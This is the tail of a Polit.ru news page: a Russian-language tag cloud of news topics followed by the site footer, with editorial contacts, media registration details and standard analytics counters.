  <a href="/tag/sberbank/" class="weight8">Сбербанк</a>
  

  

  
  <a href="/tag/sverdlovskaya-oblast/" class="weight6">Свердловская область</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/communications/" class="weight7">связь</a>
  

  
  <a href="/tag/telecom/" class="weight9">связь и телекоммуникации</a>
  

  
  <a href="/tag/sevastopol/" class="weight7">Севастополь</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/selskoe-hozyajstvo/" class="weight7">сельское хозяйство</a>
  

  

  

  
  <a href="/tag/separatizm/" class="weight10">сепаратизм</a>
  

  
  <a href="/tag/serbiya/" class="weight5">Сербия</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/sergej-lavrov/" class="weight9">Сергей Лавров</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/sergej-sobyanin/" class="weight7">Сергей Собянин</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/sergey-shoigu/" class="weight8">Сергей Шойгу</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/siriya/" class="weight11 force-hi">Сирия</a>
  

  

  

  

  

  
  <a href="/tag/skolkovo/" class="weight8">Сколково</a>
  

  

  

  
  <a href="/tag/slavyansk/" class="weight7">Славянск</a>
  

  

  
  <a href="/tag/committee_of_inquiry/" class="weight11 force-hi">Следственный комитет</a>
  

  
  <a href="/tag/sledstvie/" class="weight9">следствие</a>
  

  

  

  
  <a href="/tag/smartphones/" class="weight4">смартфоны</a>
  

  

  
  <a href="/tag/mass_media/" class="weight7">СМИ</a>
  

  

  

  

  

  
  <a href="/tag/sovbez-oon/" class="weight7">Совбез ООН</a>
  

  

  

  
  <a href="/tag/sovet-po-pravam-cheloveka/" class="weight4">Совет по правам человека</a>
  

  
  <a href="/tag/sovet-federacii/" class="weight9">Совет Федерации</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/sotovaya-svyaz/" class="weight6">сотовая связь</a>
  

  

  

  
  <a href="/tag/social_network/" class="weight8">социальные сети</a>
  

  

  
  <a href="/tag/sociology/" class="weight5">социология</a>
  

  
  <a href="/tag/sociology_russia/" class="weight7">Социология в России</a>
  

  

  
  <a href="/tag/sochi/" class="weight8">Сочи</a>
  

  
  <a href="/tag/sochi_olympics/" class="weight9">Сочи 2014</a>
  

  

  

  

  

  
  <a href="/tag/spartak/" class="weight6">«Спартак»</a>
  

  

  

  
  <a href="/tag/specsluzhby/" class="weight5">спецслужбы</a>
  

  

  

  

  

  
  <a href="/tag/spravedlivaya-rossiya/" class="weight7">«Справедливая Россия»</a>
  

  
  <a href="/tag/sputnik/" class="weight8 force-hi">спутники</a>
  

  

  

  

  
  <a href="/tag/ussr_topic/" class="weight8">СССР</a>
  

  
  <a href="/tag/stavropolskij-kraj/" class="weight6">Ставропольский край</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/stihijnye-bedstviya/" class="weight8">стихийные бедствия</a>
  

  
  <a href="/tag/stix/" class="weight7">Стихотворения на случай</a>
  

  

  

  
  <a href="/tag/strahovanie/" class="weight5">страхование</a>
  

  
  <a href="/tag/strelba/" class="weight9">стрельба</a>
  

  

  

  

  
  <a href="/tag/building/" class="weight7">строительство</a>
  

  

  

  

  

  

  
  <a href="/tag/courts/" class="weight11 force-hi">суды</a>
  

  
  <a href="/tag/suicid/" class="weight7">суицид</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/usa/" class="weight12 force-hi">США</a>
  

  

  

  

  

  
  <a href="/tag/tadzhikistan/" class="weight5">Таджикистан</a>
  

  
  <a href="/tag/tailand/" class="weight8">Таиланд</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/tatarstan/" class="weight7">Татарстан</a>
  

  

  

  

  

  
  <a href="/tag/theatre/" class="weight7">театр</a>
  

  

  

  
  <a href="/tag/TV/" class="weight9">телевидение</a>
  

  
  <a href="/tag/telefonnyj-terrorizm/" class="weight4">телефонный терроризм</a>
  

  

  

  

  

  

  
  <a href="/tag/terakt/" class="weight10">теракт</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/terrorizm/" class="weight11 force-hi">терроризм</a>
  

  

  
  <a href="/tag/technology/" class="weight0 macrotag">технологии</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/transportation/" class="weight9">транспорт</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/turizm/" class="weight9">туризм</a>
  

  

  

  
  <a href="/tag/turciya/" class="weight10 force-hi">Турция</a>
  

  

  
  <a href="/tag/dungeons_and_dragons/" class="weight9">тюрьмы и колонии</a>
  

  
  <a href="/tag/murder/" class="weight11 force-hi">убийство</a>
  

  

  

  

  

  

  
  <a href="/tag/uefa/" class="weight6">УЕФА</a>
  

  

  

  

  

  
  <a href="/tag/ukraine/" class="weight13 force-hi">Украина</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/trud/" class="weight6">Условия труда</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/fas/" class="weight7">ФАС</a>
  

  

  

  

  

  
  <a href="/tag/federalnaya-migracionnaya-sluzhba/" class="weight7">Федеральная миграционная служба</a>
  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/physics/" class="weight7">физика</a>
  

  

  

  

  
  <a href="/tag/philipines/" class="weight4">Филиппины</a>
  

  

  

  

  
  <a href="/tag/finland/" class="weight6">Финляндия</a>
  

  
  <a href="/tag/fifa/" class="weight8">ФИФА</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/fondovaya-birzha/" class="weight9">фондовая биржа</a>
  

  

  

  

  

  

  
  <a href="/tag/photorep/" class="weight7">фоторепортаж</a>
  

  
  <a href="/tag/francois_hollande/" class="weight7">Франсуа Олланд</a>
  

  

  
  <a href="/tag/france/" class="weight10 force-hi">Франция</a>
  

  

  
  <a href="/tag/fsb/" class="weight9">ФСБ</a>
  

  
  <a href="/tag/fsin/" class="weight7">ФСИН</a>
  

  
  <a href="/tag/fskn/" class="weight6">ФСКН</a>
  

  

  

  

  

  

  
  <a href="/tag/soccer/" class="weight11 force-hi">футбол</a>
  

  

  

  
  <a href="/tag/habarovskij-kraj/" class="weight7">Хабаровский край</a>
  

  

  

  

  
  <a href="/tag/hakery/" class="weight9">хакеры</a>
  

  

  

  

  
  <a href="/tag/harkov/" class="weight6">Харьков</a>
  

  

  

  

  

  

  
  <a href="/tag/hillari-klinton/" class="weight8">Хиллари Клинтон</a>
  

  
  <a href="/tag/chemical_weapon/" class="weight7">химическое оружие</a>
  

  

  

  

  

  

  

  
  <a href="/tag/hokkej/" class="weight8">хоккей</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/huliganstvo/" class="weight5">хулиганство</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/centrobank/" class="weight10">Центробанк</a>
  

  

  

  

  
  <a href="/tag/cik/" class="weight7">ЦИК</a>
  

  
  <a href="/tag/vzr/" class="weight0 force-hi macrotag">Цикл бесед &quot;Взрослые люди&quot;</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/cska/" class="weight6">ЦСКА</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/chelyabinskaya-oblast/" class="weight7">Челябинская область</a>
  

  

  

  

  

  

  
  <a href="/tag/chekh_republic/" class="weight3">Чехия</a>
  

  
  <a href="/tag/chechnya/" class="weight10 force-hi">Чечня</a>
  

  

  

  

  

  
  <a href="/tag/world_cup_2018/" class="weight6">ЧМ-2018</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/shahty/" class="weight6">шахты</a>
  

  
  <a href="/tag/switzerland/" class="weight7">Швейцария</a>
  

  
  <a href="/tag/sweden/" class="weight6">Швеция</a>
  

  

  

  
  <a href="/tag/schcool/" class="weight8">школа</a>
  

  

  

  

  
  <a href="/tag/showbiz/" class="weight4">шоу-бизнес</a>
  

  
  <a href="/tag/shpionazh/" class="weight8">шпионаж</a>
  

  

  

  

  

  
  <a href="/tag/ebola/" class="weight7">Эбола</a>
  

  

  

  

  

  
  <a href="/tag/edvard-snouden/" class="weight8">Эдвард Сноуден</a>
  

  

  

  

  
  <a href="/tag/ecology/" class="weight9">экология</a>
  

  
  <a href="/tag/economy/" class="weight10">экономика</a>
  

  

  
  <a href="/tag/ekonomicheskij-krizis/" class="weight9">экономический кризис</a>
  

  

  

  

  

  
  <a href="/tag/extremismus/" class="weight8">экстремизм</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/estoniya/" class="weight6">Эстония</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/south_korea/" class="weight8">Южная Корея</a>
  

  

  

  

  

  
  <a href="/tag/yukos/" class="weight10">ЮКОС</a>
  

  
  <a href="/tag/yuliya-timoshenko/" class="weight6">Юлия Тимошенко</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/nuclear_weapon/" class="weight8">ядерное оружие</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/japan/" class="weight9">Япония</a>
  

  

  

  

  

</div>



  
</div>

      
    
  
  </div>




    <!--BEGIN #footer-->

    <!--BEGIN #footer-->
    <div style="margin: 15px 0 25px;">
      <!--LiveInternet counter--><script type="text/JavaScript"><!--
        document.write('<a href="http://www.liveinternet.ru/click" target=liveinternet rel="nofollow"><img src="//counter.yadro.ru/hit?t45.6;r'+
          escape(document.referrer)+((typeof(screen)=='undefined')?'':';s'+screen.width+'*'+screen.height+'*'+(screen.colorDepth?
          screen.colorDepth:screen.pixelDepth))+';'+Math.random()+'" border=0 width=31 height=31 alt="liveinternet.ru"></a>')
      //--></script><!--/LiveInternet-->
    </div>
    <div class="info-container stop">
      <div class="first">
        <h4 class="subject block-subject"><a href="/rubric/redakciya/" rel="nofollow" style="color:#FFF;">Редакция</a></h4>
        Электронная почта: <a href="mailto:politru.edit1@gmail.com" rel="nofollow">politru.edit1@gmail.com</a>
        <br/>
        Адрес: 129343, Москва, проезд Серебрякова, д.2, корп.1, 9 этаж.
        <br/>
        Телефон: +7 495 980 1894.
        <br/>
        <a href="/static/price.xlsx">Стоимость услуг Полит.ру</a>
                    <!-- Yandex.Metrika counter -->
                    <div style="display:none;"><script type="text/javascript">
                    (function(w, c) {
                        (w[c] = w[c] || []).push(function() {
                            try {
                                w.yaCounter5421865 = new Ya.Metrika(5421865);
                                 yaCounter5421865.clickmap(true);
                                 yaCounter5421865.trackLinks(true);

                            } catch(e) { }
                        });
                    })(window, 'yandex_metrika_callbacks');
                    </script></div>
                    <script src="//mc.yandex.ru/metrika/watch.js" type="text/javascript"
                    defer="defer"></script>
                    <noscript><div><img src="//mc.yandex.ru/watch/5421865"
                    style="position:absolute; left:-9999px;" alt="" /></div></noscript>
                    <!-- /Yandex.Metrika counter -->
      </div>
      <div class="agelimit"></div>
      <div class="second">
        Свидетельство о регистрации средства массовой информации<br/>
        Эл. № 77-8425 от 1 декабря 2003г. Выдано министерством<br/>
        Российской Федерации по делам печати, телерадиовещания и<br/>
        средств массовой информации.
        Выходит с 21 февраля 1998 года.<br/>
        При любом использовании материалов веб-сайта ссылка на Полит.ру обязательна.<br/>
        При перепечатке в Интернете обязательна гиперссылка <a href="/">polit.ru</a>.<br/>
        Все права защищены и охраняются законом.<br/>
        © Полит.ру, 1998–2014<a rel="nofollow" href="/purge/news/2017/07/06/school/" style="text-decoration: none; color: #FFFFFF;">.</a>
      </div>
    </div>
    <div class="black-bottom stop">

    </div>
  </div>


	


    <!--END #footer-->
  <script type="text/javascript">
    (window.Image ? (new Image()) : document.createElement('img')).src = location.protocol + '//vk.com/rtrg?r=DWczk9hWeAvkw4Spq8D4hz2w1MfxfpmDx/ZgQHRFD0o641mnFqVMc*QV8joivbZSsPA/URYGFFIRCucM8ibEezf2AYNfSVMgaMW2N1cgx/flht*xh7XqKekOJqgAXuZvzaemjUVvGkCuk5jEUkCi*4*H82g4/Y64rYb2Itn*pT0-';
    load_banners();
  </script>
</body>
</html>

